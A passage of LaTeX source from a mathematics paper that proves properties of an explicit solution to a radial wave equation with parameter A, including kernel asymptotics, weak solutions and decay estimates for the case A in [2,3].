u_g=&\frac{1}{\Gamma\kl(\frac{A-1}{2}\kr)} \int_{0}^{\infty}\int_{-1}^{1} g(\rho)\mathcal{X}_+^{\frac{1-A}{2}}\kl(t^2-r^2-\rho^2+2r\rho\lambda\kr)\rho^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\rho.\\
=&\frac{1}{\Gamma\kl(k+\theta\kr)} \int_{0}^{\infty}\int_{-1}^{1} g\kl(\sqrt{r^2+\tilde\rho^2-2r\tilde\rho\tilde\lambda}\kr)\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)} \int_{0}^{\infty}\int_{-1}^{1}}
\times\mathcal{X}_+^{-k-\theta}\kl(t^2-\tilde\rho^2\kr)\tilde\rho^{A-1}\sqrt{1-\tilde\lambda^2}^{A-3}\d \tilde\lambda\d\tilde\rho\\
=&\frac{1}{\Gamma\kl(k+\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\int_{0}^{\infty}\int_{-1}^{1} g\kl(\sqrt{r^2+\tilde\rho^2-2r\tilde\rho\tilde\lambda}\kr)\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\int_{0}^{\infty}\int_{-1}^{1}}
\times\mathcal{X}_+^{-\theta}\kl(t^2-\tilde\rho^2\kr)\tilde\rho^{A-1}\sqrt{1-\tilde\lambda^2}^{A-3}\d \tilde\lambda\d\tilde\rho.
\end{Eq*}
Set $\tilde\rho=t\sigma$ and $\tilde\lambda=\lambda$. Considering the definition of $\mathcal{X}_+^{-\theta}$ we finally reach
\begin{Eq}\label{Eq:u_g_c}
u_g=&\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\Bigg(t^{1+2k}\int_{0}^{1}\int_{-1}^{1} \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\Bigg(t^{1+2k}\int_{0}^{1}\int_{-1}^{1}}\times\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\Bigg).
\end{Eq}
\value{parta}[Differentiability, boundary requirement and initial requirement]
Now we begin the proof.
Firstly, using the expression we just obtained,
we can easily check that $u\in C^2({\mathbb{R}}_+^2)$ while $g\in C_0^\infty((0,\infty))$.
We can also calculate that
\begin{Eq*}
\partial_ru=&\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)} \kl(\frac{\partial_t}{2t}\kr)^kt^{1+2k}\int_{0}^{1}\int_{-1}^{1}\frac{r-t\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}} \frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)} \kl(\frac{\partial_t}{2t}\kr)^kt^{1+2k}\int_{0}^{1}\int_{-1}^{1}}
\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Let $r=0$.
Since the integrand is an odd function of $\lambda$,
such $u$ satisfies the boundary requirement.
To check the initial conditions we temporarily use the original expression in \Le{Le:u_e}.
Using \Le{Le:I_p} we know $I_A(\mu)=0$ when $\mu>1$, which happens when $\rho<r-t$ with $r>t$.
Then for any $r>t>0$, we have
\begin{Eq*}
u(t,r)=&r^{\frac{1-A}{2}} \int_{r-t}^{t+r}\rho^{\frac{A-1}{2}}g(\rho) I_A\kl(\mu\kr) \d \rho\\
u_t(t,r)=&r^{\frac{1-A}{2}}\kl((t+r)^{\frac{A-1}{2}}g(t+r)+(r-t)^{\frac{A-1}{2}}g(r-t)\kr)I_A(1-)\\
&+r^{\frac{1-A}{2}} \int_{r-t}^{t+r}\rho^{\frac{A-1}{2}}g(\rho) \frac{-t}{r\rho}I_A'\kl(\mu\kr) \d \rho.
\end{Eq*}
Let $t\rightarrow 0$.
Using \Le{Le:I_p} again
we find $u(0,r)=0$ and $u_t(0,r)=g(r)$.
\value{parta}[Differential equation requirement]
Finally,
we need to check that $u$ satisfies \eqref{Eq:u_l}.
By a calculation trick
\begin{Eq*}
\partial_t^2 \kl(\frac{\partial_t}{t}\kr)^{k}t^{1+2k}=\kl(\frac{\partial_t}{t}\kr)^{k+1}t^{2k+2}\partial_t,
\end{Eq*}
(see e.g. \cite[Lemma 2 in Section 2.4]{MR2597943}) we calculate that
\begin{Eq*}
\partial_t^2 u=&\frac{2}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}w_1\kr),\\
w_1:=&\int_{0}^{1}\int_{-1}^{1}\frac{t\sigma^2-r\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}} \frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
On the other hand, a similar process as that deduced \eqref{Eq:u_g_c} also shows
\begin{Eq*}
u=&\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma\kl(2-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2} \tilde w_2\kr),\\
\tilde w_2:=&t\int_{0}^{1}\int_{-1}^{1} \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Then, we see
\begin{Eq*}
\partial_r\tilde w_2=&t\int_{0}^{1}\int_{-1}^{1}\frac{r-t\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}}\frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\\
=&-\int_{0}^{1}\int_{-1}^{1}\frac{\partial_\lambda g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-2}\sqrt{1-\lambda^2}^{A-1}\d \lambda\d\sigma\\
&-\int_{0}^{1}\int_{-1}^{1}\lambda \frac{\partial_\sigma g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Using integration by parts, we get
\begin{Eq*}
\partial_r\tilde w_2=&-2(1-\theta)\int_{0}^{1}\int_{-1}^{1}\lambda \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta}}\sigma^{A}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Thus we have
\begin{Eq*}
\partial_r u=&\frac{2}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}w_2\kr)\\
w_2:=&-\int_{0}^{1}\int_{-1}^{1}\lambda \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta}}\sigma^{A}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Taking the derivative again, we also have
\begin{Eq*}
\partial_r^2 u=&\frac{2}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}w_3\kr)\\
w_3:=&\int_{0}^{1}\int_{-1}^{1}\frac{t\sigma^2\lambda^2-r\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}} \frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Gluing $\partial_t^2u$, $\partial_r^2 u$ and $\partial_r u$ together, we finally calculate
\begin{Eq*}
&(\partial_t^2-\partial_r^2-(A-1)r^{-1}\partial_r)u\\
=&\frac{2r^{-1}}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}\kl(rw_1-rw_3-(A-1)w_2\kr)\kr)
\end{Eq*}
where
\begin{Eq*}
rw_1-rw_3=&-\int_{0}^{1}\int_{-1}^{1}\frac{\partial_\lambda g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\sigma^{A}\sqrt{1-\lambda^2}^{A-1}\d \lambda\d\sigma\\
=&(A-1)w_2.
\end{Eq*}
This finishes the proof.
\subsection{Proof of \Le{Le:I_p}}
We begin with the second half of \eqref{Eq:I_p_1},
it is trivial since $\mathcal{X}_+^{\frac{1-A}{2}}\kl(\lambda-\mu\kr)=0$ for $\lambda\in[-1,1]$ and $\mu>1$.
As for other results, we need to divide $A$ into two cases.
\setcounter{part0}{0}
\value{parta}[$A$ is not odd]
We begin with the case that $A$ is not odd, i.e. $A=1+2k+2\theta$ with $k\in {\mathbb{N}}_0$ and $0<\theta<1$.
By definition we see that when $\mu\leq -2$ and $\lambda\in[-1,1]$, we have
\begin{Eq*}
\partial_\mu^m \mathcal{X}_+^{\frac{1-A}{2}}\kl(\lambda-\mu\kr)\approx (1-\mu)^{\frac{1-A}{2}-m},
\end{Eq*}
which gives \eqref{Eq:I_p_2}. When $-1<\mu<1$, $I_A$ has the formula
\begin{Eq*}
I_A(\mu)=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)} \int_{-1}^{1} \partial_\lambda^k\mathcal{X}_+^{-\theta}\kl(\lambda-\mu\kr)(1-\lambda^2)^{k+\theta-1}\d \lambda\\
=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)}\int_{-1}^{1} \mathcal{X}_+^{-\theta}\kl(\lambda-\mu\kr)(-\partial_\lambda)^k(1-\lambda^2)^{k+\theta-1}\d \lambda\\
=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)}\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\sum_{j=0}^{\lfloor k/2\rfloor }C_{j,k,\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda
\end{Eq*}
with some constants $C_{j,k,\theta}$. Here $\lfloor a\rfloor$ stands for the integer part of $a$.
\subpart[$\mu$ close to $1-$]
Firstly we let $\mu$ close to $1-$. Introducing $\lambda=(1-\mu)\sigma+\mu$, we have
\begin{Eq*}
&\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&(1-\mu)^j\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma.
\end{Eq*}
Let $\mu\rightarrow 1-$. Using dominated convergence theorem, we find the limit is nonzero only if $j=0$, where
\begin{Eq*}
&\lim_{\mu\rightarrow 1-}\int_0^1 \sigma^{-\theta}(1-\sigma)^{\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k}\kl(\sigma+\mu-\mu\sigma+1\kr)^{\theta-1}\d\sigma\\
=&2^{\theta-1}\int_0^1 \sigma^{-\theta}(1-\sigma)^{\theta-1}\d\sigma.
\end{Eq*}
Now, we calculate
\begin{Eq*}
C_{0,k,\theta}=\begin{cases}
1,&k=0;\\
2^k(k+\theta-1)(k+\theta-2)\cdots \theta,&k>0,
\end{cases}
\end{Eq*}
then
\begin{Eq*}
\lim_{\mu\rightarrow 1-}I_A(\mu)=&\frac{1}{2\Gamma\kl(\theta\kr)\Gamma(1-\theta)}\int_{0}^{1} \sigma^{-\theta}(1-\sigma)^{\theta-1}\d \sigma=\frac{1}{2}.
\end{Eq*}
This finishes the first half of \eqref{Eq:I_p_1} for non odd $A$.
For derivative, we calculate
\begin{Eq*}
&\partial_\mu\kl((1-\mu)^j\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma\kr)\\
=&j(1-\mu)^{j-1}\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma\\
&+(k-2j)(1-\mu)^j\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j-1}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma\\
&+(j+\theta-1)\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-2}\d\sigma,
\end{Eq*}
with no singularity in all these integrals. This means $\partial_\mu I_A(\mu)=O(1)$ for $\mu$ close to $1-$, which corroborates with \eqref{Eq:I_p_4}.
\subpart[$\mu$ close to $-1+$]
Then we let $\mu$ close to $-1+$, without loss of generality we assume $\mu<-1/2$, then
\begin{Eq*}
&\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&\int_{\mu}^{0} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda+\int_{0}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&\int_{\mu}^{0} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta-1}h(\lambda)\d \lambda+O(1),
\end{Eq*}
where $h(\lambda):=\lambda^{k-2j}(1-\lambda)^{j+\theta-1}$ satisfying $h(\lambda)\in C^\infty([-1,0])$. For the first integral, we split it to
\begin{Eq*}
&\int_{\mu}^{0} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta-1}(h(\lambda)-h(-1))\d \lambda
+h(-1)\int_{\mu}^{0} (1+\lambda)^{j-1}\d \lambda\\
&+h(-1)\kl(\int_{\mu}^{1+2\mu}+\int_{1+2\mu}^0\kr) \kl((\lambda-\mu)^{-\theta}-(1+\lambda)^{-\theta}\kr)(1+\lambda)^{j+\theta-1}\d \lambda\\
\equiv& J_1+J_2+J_3+J_4.
\end{Eq*}
Using the mean value theorem, it is easy to find that
\begin{Eq*}
|J_1|\lesssim& \int_{\mu}^{0} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta}\d \lambda \lesssim 1,\\
J_2=&C_j\ln(1+\mu)+O(1),\\
|J_3|\lesssim& (1+\mu)^{j+\theta-1}\int_{\mu}^{1+2\mu} (\lambda-\mu)^{-\theta}-(1+\lambda)^{-\theta}\d \lambda\lesssim (1+\mu)^j\lesssim 1,\\
|J_4|\lesssim&(1+\mu)\int_{1+2\mu}^{0}(1+\lambda)^{j-2}\d \lambda\lesssim 1.
\end{Eq*}
Adding together, we find
\begin{Eq*}
\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda
=& C_j\ln(1+\mu)+O(1),
\end{Eq*}
which gives \eqref{Eq:I_p_3} for $-1<\mu$.
As for the derivative, we introduce the change of variable $\lambda=\sigma(1+\mu)-1$, then
\begin{Eq*}
&\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&(1+\mu)^{j}\int_{1}^{(1+\mu)^{-1}} (\sigma-1)^{-\theta}\sigma^{j+\theta-1}h(\sigma(1+\mu)-1)\d \sigma\\
&+\int_{0}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda.
\end{Eq*}
Taking derivative and splitting it similarly as above, we also find
\begin{Eq*}
\partial_\mu\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda=C_j'(1+\mu)^{-1}+O\kl(|\ln(1+\mu)|+1\kr),
\end{Eq*}
which gives \eqref{Eq:I_p_4} for $-1<\mu$.
\subpart[$\mu$ close to $-1-$]
To get another part of \eqref{Eq:I_p_3}, we only need to control $I_A(\mu)-I_A(-2-\mu)$ for $-3/2< \mu<-1$. Here, for $-2\leq \mu<-1$, $I_A$ has the formula
\begin{Eq*}
I_A(\mu)=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)}\int_{-1}^{1} (\lambda-\mu)^{-\theta}\sum_{j=0}^{\lfloor k/2 \rfloor}C_{j,k,\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda.
\end{Eq*}
Thus, to show \eqref{Eq:I_p_3}, we only need to estimate
\begin{Eq*}
&\int_{-1}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda-\int_{-\mu-2}^{1} (\lambda+\mu+2)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&\int_{-1}^{-\mu-2} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta-1}h(\lambda)\d \lambda\\
&+\kl(\int_{-\mu-2}^{-2\mu-3}+\int_{-2\mu-3}^{0}\kr) \kl((\lambda-\mu)^{-\theta}-(\lambda+\mu+2)^{-\theta}\kr)(1+\lambda)^{j+\theta-1}h(\lambda)\d \lambda\\
&+\int_{0}^{1} \kl((\lambda-\mu)^{-\theta}-(\lambda+\mu+2)^{-\theta}\kr)\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
\equiv& J_1+J_2+J_3+J_4.
\end{Eq*}
Here we have
\begin{Eq*}
|J_1|\lesssim &(-1-\mu)^{-\theta}\int_{-1}^{-\mu-2} (1+\lambda)^{j+\theta-1}|h(\lambda)|\d \lambda\lesssim 1,\\
|J_2|\lesssim &(-1-\mu)^{j+\theta-1}\int_{-\mu-2}^{-2\mu-3}(\lambda-\mu)^{-\theta}-(\lambda+\mu+2)^{-\theta}\d\lambda\lesssim(-1-\mu)^j\lesssim 1,\\
|J_3|\lesssim &(-1-\mu)\int_{-2\mu-3}^{0}(1+\lambda)^{j-2}\d\lambda\lesssim 1,\\
|J_4|\lesssim &\int_{0}^{1}(1-\lambda)^{j+\theta-1}\d\lambda\lesssim 1.\\
\end{Eq*}
In summary, we finish the proof of \eqref{Eq:I_p_3}.
As for the derivative, we introduce the change of variable $\lambda=\mu-\sigma(1-\mu)$ for $J_2$.
A similar approach as above we find $|\partial_\mu(J_1+J_2+J_3+J_4)|\lesssim |\ln(1+\mu)|+1$.
This finishes the proof of \eqref{Eq:I_p_4}.
\value{parta}[$A$ is odd]
Next, we consider the case $A=1+2k$ with $k\in {\mathbb{Z}}_+$. In this case we have
\begin{Eq*}
\supp \mathcal{X}_+^{\frac{1-A}{2}}\kl(x\kr)=\supp \delta^{(k-1)}\kl(x\kr)=\{0\},
\end{Eq*}
which gives \eqref{Eq:I_p_5}. On the other hand, when $-1<\mu<1$, we have
\begin{Eq*}
I_A(\mu)=&\frac{2^{-k}}{\Gamma\kl(k\kr)} \int_{-1}^{1} \partial_\lambda^{k-1}\delta\kl(\lambda-\mu\kr)(1-\lambda^2)^{k-1}\d \lambda\\
=&\frac{2^{-k}}{\Gamma\kl(k\kr)}\int_{-1}^{1} \delta\kl(\lambda-\mu\kr)(-\partial_\lambda)^{k-1}(1-\lambda^2)^{k-1}\d \lambda\\
=&\frac{2^{-k}}{\Gamma\kl(k\kr)}\sum_{j=0}^{\lfloor (k-1)/2 \rfloor}C_{j,k}'\mu^{k-1-2j}(1-\mu^2)^{j}.
\end{Eq*}
This means there is no singularity both for $I_A(\mu)$ and its derivate, which lead to \eqref{Eq:I_p_6}.
Here we also find $C_{0,k}'=2^{k-1}(k-1)!$,
which implies the first half of \eqref{Eq:I_p_1} for odd $A$. Now we finish the proof of \Le{Le:I_p}.
\subsection{Additional discussion of weak solutions}
In light of the fact that the framework we take is slightly different from the usual one,
we will discuss a bit more of the weak solution.
We will show that when
\begin{Eq}\label{Eq:u_i_r}
r^{A-1}f\in L_{loc;r}^1,~r^{A-1}g\in L_{loc;r}^1,~ r^{A-1}F\in L_{loc;t,r}^1,~r^{A-1}u\in L_{loc;t,r}^1
\end{Eq}
with $u$ calculated by \Le{Le:u_e}, then \eqref{Eq:u_i} holds.
To show this result,
we divide $u$ to $u_g$, $u_f$ and $u_F$.
We begin with $u_g$ part. Noticing $I_A(\mu)=0$ while $\mu>1$, in this case we have
\begin{Eq*}
&\int_0^T\int_0^\infty u\cdot \kl(\partial_t^2-\Delta_A\kr)\phi r^{A-1}\d r\d t\\
=&\int_0^T\int_0^\infty \int_{0}^\infty r^{\frac{A-1}{2}}\rho ^{\frac{A-1}{2}}g(\rho) I_A\kl(\frac{r^2+\rho^2-t^2}{2r\rho}\kr) \kl(\partial_t^2-\Delta_A\kr)\phi(t,r) \d \rho\d r\d t.
\end{Eq*}
Set $t=T-s$, swap $r$ and $\rho$ then exchange the order of integration. It goes to
\begin{Eq*}
&\int_0^\infty \int_0^T \int_0^\infty r^{\frac{A-1}{2}}\rho ^{\frac{A-1}{2}}g(r) I_A\kl(\frac{r^2+\rho^2-(T-s)^2}{2r\rho}\kr) \kl(\partial_s^2-\Delta_A\kr)\phi(T-s,\rho) \d \rho\d s\d r.
\end{Eq*}
Here $\phi(T-s,\rho)$ has zero initial data at $s=0$ and regular enough, by expression of $u_F$ deduced in \Le{Le:u_e}, we know
\begin{Eq*}
&r^{\frac{1-A}{2}}\int_0^T \int_0^\infty \rho ^{\frac{A-1}{2}} I_A\kl(\frac{r^2+\rho^2-(T-s)^2}{2r\rho}\kr) \kl(\partial_s^2-\Delta_A\kr)\phi(T-s,\rho) \d \rho\d s\\
=&\kl.\phi(T-s,r)\kr|_{s=T}=\phi(0,r).
\end{Eq*}
This gives \eqref{Eq:u_i} with $f=F=0$. The proof of $u_f$ and $u_F$ parts is similar, we leave them to the interested reader.
\section{Long-time existence for $A\in[2,3]$}\label{Se:3}
In this section, we will consider the case $A\in[2,3]$, and show the proof of \Th{Th:M_1}. Without loss of generality we assume $n\neq A$, otherwise $V=0$ then \eqref{Eq:U_o} reduced to the equation of \emph{Strauss} conjecture.
By the discussion in the last section, we begin to study the equation \eqref{Eq:u_o} and \eqref{Eq:u_l}.
\subsection{Estimate for homogeneous solution}
In this subsection, we will give an estimate of the homogeneous solution to \eqref{Eq:u_l}.
\begin{lemma}\label{Le:u0_e}
Let $A\in[2,3]$, $n\geq 2$ and assume $\supp(f,g)\subset [0,1)$. We have
\begin{Eq*}
|u_f+u_g|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl(\|\rho g(\rho)\|_{L_\rho^\infty}+\|f(\rho)\|_{L_\rho^\infty}+\|\rho f'(\rho)\|_{L_\rho^\infty}\kr).
\end{Eq*}
Here and throughout the paper, $\kl<a\kr>$ stands for $\sqrt{|a|^2+4}$.
\end{lemma}
\begin{proof}[Proof of \Le{Le:u0_e}]
Here we define
\begin{Eq*}
\Omega_0:=\{\rho:0<\rho<t-r\},\qquad \Omega_1:=\{\rho:|t-r|<\rho<\min(1,t+r)\},
\end{Eq*}
with $\Omega_0=\emptyset$ when $t<r$.
\setcounter{part0}{0}
\value{parta}[Estimate of $u_g$ with $A\in[2,3)$]
Firstly we consider $u_g$ with $A\in[2,3)$. For $u_g$, by \Le{Le:u_e} and \eqref{Eq:I_p_1} we have
\begin{Eq*}
u_g(t,r)=&r^{\frac{1-A}{2}}\kl(\int_{\Omega_0}+\int_{\Omega_1}\kr)I_A(\mu)\rho^{\frac{A-1}{2}}g(\rho)\d\rho
\equiv J_{0}+J_{1}.
\end{Eq*}
Also, for $A\in[2,3)$ we have
\begin{Eq*}
|\ln|1+\mu||\lesssim |1+\mu|^{\frac{A-3}{2}}\lesssim |1+\mu|^{\frac{1-A}{2}},\qquad -2<\mu<1.
\end{Eq*}
\subpart[$t+r\leq 4$]
In this part, we have $\kl<t+r\kr>\approx \kl<t-r\kr>\approx 1$ and $r\lesssim 1$.
In the region of $\Omega_0$ where $\mu<-1$,
by \eqref{Eq:I_p_2} and \eqref{Eq:I_p_3} we see
\begin{Eq*}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(t-r-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim r^{\frac{A-1}{2}}(t-r-\rho)^{\frac{1-A}{2}}.
\end{Eq*}
Then we have
\begin{Eq*}
|J_{0}|\lesssim& \int_{0}^{t-r}(t-r-\rho)^{\frac{1-A}{2}} \rho^{\frac{A-3}{2}}\rho|g(\rho)|\d\rho\\
\lesssim&\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
In the region of $\Omega_1$ where $\mu>-1$, by \eqref{Eq:I_p_3} we see
\begin{Eq*}
|I_A(\mu)|\lesssim (1+\mu)^{\frac{A-3}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(r+\rho-t)}\kr)^{\frac{3-A}{2}}
\lesssim \rho^{\frac{3-A}{2}}(r+\rho-t)^{\frac{A-3}{2}}.
\end{Eq*}
Thus we get
\begin{Eq*}
|J_{1}|\lesssim& r^{\frac{1-A}{2}}\int_{|t-r|}^{t+r}(r+\rho-t)^{\frac{A-3}{2}} \rho|g(\rho)|\d\rho\\
\lesssim&\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho^{\frac{A-1}{2}}g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
\subpart[$t+r\geq 4$, $-1\leq t-r\leq 2$]
In this part, we have $\kl<t-r\kr>\approx 1$ and $r\approx \kl<t+r\kr>$.
In the region of $\Omega_0$ where $\mu<-1$, we have
\begin{Eq*}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(t-r-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \rho^{\frac{A-1}{2}}(t-r-\rho)^{\frac{1-A}{2}}.
\end{Eq*}
Then we get
\begin{Eq*}
|J_{0}|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\int_{0}^{t-r}(t-r-\rho)^{\frac{1-A}{2}} \rho^{A-2}\rho|g(\rho)|\d\rho\\
\lesssim&\kl<t+r\kr>^{\frac{1-A}{2}}(t-r)^{\frac{A-1}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
In the region of $\Omega_1$ where $\mu>-1$, we also have
\begin{Eq*}
|I_A(\mu)|\lesssim (1+\mu)^{\frac{A-3}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(r+\rho-t)}\kr)^{\frac{3-A}{2}}
\lesssim \rho^{\frac{3-A}{2}}(r+\rho-t)^{\frac{A-3}{2}}.
\end{Eq*}
Then we see
\begin{Eq*}
|J_{1}|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\int_{|t-r|}^{2}(r+\rho-t)^{\frac{A-3}{2}} \rho|g(\rho)|\d\rho\\
\lesssim&\kl<t+r\kr>^{\frac{1-A}{2}}(r+2-t)^{\frac{A-1}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
\subpart[$t+r\geq 4$, $t-r\geq 2$]
In this part, we have $t+r\gtrsim\kl<t+r\kr>$ and $t-r-1\gtrsim\kl<t-r\kr>$. Here $\Omega_1=\emptyset$ so we only need to consider $\Omega_0$ where $\mu<-1$. Again we see
\begin{Eq*}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(t-r-\rho)}\kr)^{\frac{A-1}{2}}\\
\lesssim& r^{\frac{A-1}{2}}\rho^{\frac{A-1}{2}}\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}.
\end{Eq*}
Then we have
\begin{Eq*}
